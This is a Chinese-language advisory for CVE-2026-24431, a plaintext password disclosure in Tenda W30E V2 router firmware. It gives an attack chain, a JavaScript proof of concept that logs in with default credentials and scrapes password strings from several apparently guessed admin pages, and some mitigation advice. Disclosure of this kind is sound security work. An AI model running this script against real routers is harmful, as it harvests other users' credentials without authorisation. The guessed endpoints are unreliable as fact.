CVE-2026-24431 | Tenda W30E V2 固件管理界面明文显示用户密码漏洞

漏洞信息

漏洞编号

CVE-2026-24431

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shenzhen Tenda W30E V2

漏洞概述

CVE-2026-24431是深圳市腾达科技有限公司（Tenda）生产的W30E V2路由器固件中的一个信息泄露漏洞。该漏洞存在于固件V16.01.0.19(5037)及之前版本中，攻击者可以通过管理Web界面的特定页面直接查看存储的用户账户密码，且这些密码以明文形式呈现，无需任何解密操作。腾达W30E V2是一款面向企业用户的高性能双频千兆无线路由器，广泛应用于中小企业网络环境。由于该漏洞允许任何拥有低权限账户的攻击者获取其他用户的明文密码，可能导致横向移动和权限提升，严重威胁企业网络安全。漏洞的根源在于固件开发过程中未遵循安全编码最佳实践，将敏感凭证明文存储并通过Web接口直接暴露。

技术细节

该漏洞属于Web应用信息泄露类漏洞。在Tenda W30E V2固件的管理界面中，用户认证凭据（包括用户名和密码）以明文形式存储在系统数据库或配置文件中。当管理员或具有低权限的用户访问特定的管理页面时，系统直接将这些明文密码返回给客户端。攻击者只需通过正常的身份验证流程登录管理后台，然后访问受影响的页面（如用户管理、账户列表或系统状态页面），即可获取所有用户账户的明文密码。由于该漏洞不需要任何特殊的技术手段或漏洞利用工具，攻击者只需具备基本的网络访问能力和有效的低权限账户即可实施攻击。CVSS 3.1评分6.5（中等严重程度），主要因为攻击复杂度低、无需用户交互，但机密性影响为高。

攻击链分析

STEP 1

步骤1

攻击者通过局域网或互联网访问Tenda W30E V2路由器的管理Web界面

STEP 2

步骤2

使用低权限账户（如普通管理员账户）登录管理后台

STEP 3

步骤3

导航至受影响的用户管理或账户列表页面

STEP 4

步骤4

在页面响应中直接获取所有用户账户的明文密码

STEP 5

步骤5

利用获取的明文密码进行横向移动，访问更高权限的管理功能或其他关联系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-24431 PoC - Tenda W30E V2 Plaintext Password Disclosure
// Author: Security Researcher
// Target: Tenda W30E V2 Firmware <= V16.01.0.19(5037)

const axios = require('axios');

// Configuration
const TARGET_IP = '192.168.0.1';  // Router IP
const USERNAME = 'admin';
const PASSWORD = 'admin';

async function exploit() {
  console.log('[+] CVE-2026-24431 PoC - Tenda W30E V2 Password Disclosure');
  console.log('[+] Target:', TARGET_IP);
  
  try {
    // Step 1: Login to the router management interface
    const loginData = new URLSearchParams();
    loginData.append('username', USERNAME);
    loginData.append('password', PASSWORD);
    
    const loginResponse = await axios.post(
      `http://${TARGET_IP}/login.cgi`,
      loginData,
      { headers: { 'Content-Type': 'application/x-www-form-urlencoded' } }
    );
    
    console.log('[+] Login request sent');
    const cookies = loginResponse.headers['set-cookie'];
    
    // Step 2: Access the affected page to retrieve plaintext passwords
    // Common paths that may expose user credentials
    const paths = [
      '/user_mgnt.cgi',
      '/admin/account.asp',
      '/cgi-bin/user_mgnt',
      '/cgi-bin/account_list',
      '/system_status.asp'
    ];
    
    for (const path of paths) {
      try {
        const response = await axios.get(`http://${TARGET_IP}${path}`, {
          headers: { 'Cookie': cookies ? cookies.join('; ') : '' }
        });
        
        // Search for password patterns in response
        const passwordPattern = /password['"]?\s*[:=]\s*['"]([^'"]+)['"]/gi;
        const matches = response.data.match(passwordPattern);
        
        if (matches && matches.length > 0) {
          console.log(`[+] Found plaintext passwords at ${path}:`);
          matches.forEach(match => console.log('    ', match));
        }
      } catch (err) {
        console.log(`[-] Path ${path} not accessible`);
      }
    }
    
    console.log('[+] Scan complete');
  } catch (error) {
    console.error('[-] Error:', error.message);
  }
}

exploit();

影响范围

Tenda W30E V2 V16.01.0.19(5037)及之前所有版本

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制管理Web界面的访问来源，仅允许受信任的IP地址访问；2）使用强密码策略并定期更换管理账户密码；3）启用路由器的安全审计日志功能，监控账户访问行为；4）考虑使用VPN或防火墙规则限制对管理端口（通常为80/443）的访问；5）监控网络流量，及时发现异常的管理接口访问行为。